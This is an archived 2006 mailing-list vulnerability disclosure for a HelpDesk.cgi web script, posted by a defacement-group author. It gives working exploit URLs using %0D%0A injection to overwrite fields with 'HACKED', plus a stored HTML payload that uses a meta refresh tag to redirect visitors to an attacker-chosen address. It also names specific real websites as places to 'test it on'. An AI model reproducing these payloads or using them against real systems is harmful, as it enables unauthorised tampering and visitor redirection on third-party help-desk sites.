Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21517] OPT Max "CRM_inc" Parameter File Inclusion Vulnerability

[SA21519] Owl Intranet Engine Cross-Site Scripting and SQL Injection

[SA21454] phPay Open Mail Relay Vulnerability

[SA21484] Zen Cart SQL Injection and File Inclusion Vulnerabilities

From:	crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date:	17.08.2006
Subject:	HelpDesk.cgi Vulnerability

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : HelpDesk.cgi Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Usage:

http://[target]/[helpdesk_path]/helpdesk.
cgi?probtype=hardware&problem=Describe+your+problem.
%0D%0A&name=mitt&submit=Submit+Problem

you can change it :)

http://[target]/[helpdesk_path]/helpdesk.
cgi?probtype=HACKED&problem=Describe+your+problem.
%0D%0A&name=HACKED&submit=HCKED

test it on

http://www.basementnerds.com/cgi-bin/helpdesk/helpdesk.
cgi?probtype=hardware&problem=Describe+your+problem.
%0D%0A&name=mitt&submit=Submit+Problem

--
other exploit is you can write your problems and you can use good codes :)

your name = crackers

your phone =4564fasgf

mail = crackers_child@sibersavascilar.com

subject = problem

messeage = <meta http-equiv="refresh" content="0;URL=http://your adress">

test it on

http://www.pa.msu.edu/helpdesk/helpdesk.cgi?main=1&mode=2


:)

--------------------------------------------------------------------------------

greets:

X_ALPEREN_X,Root_MOr And All Other Friends

--------------------------------------------------------------------------------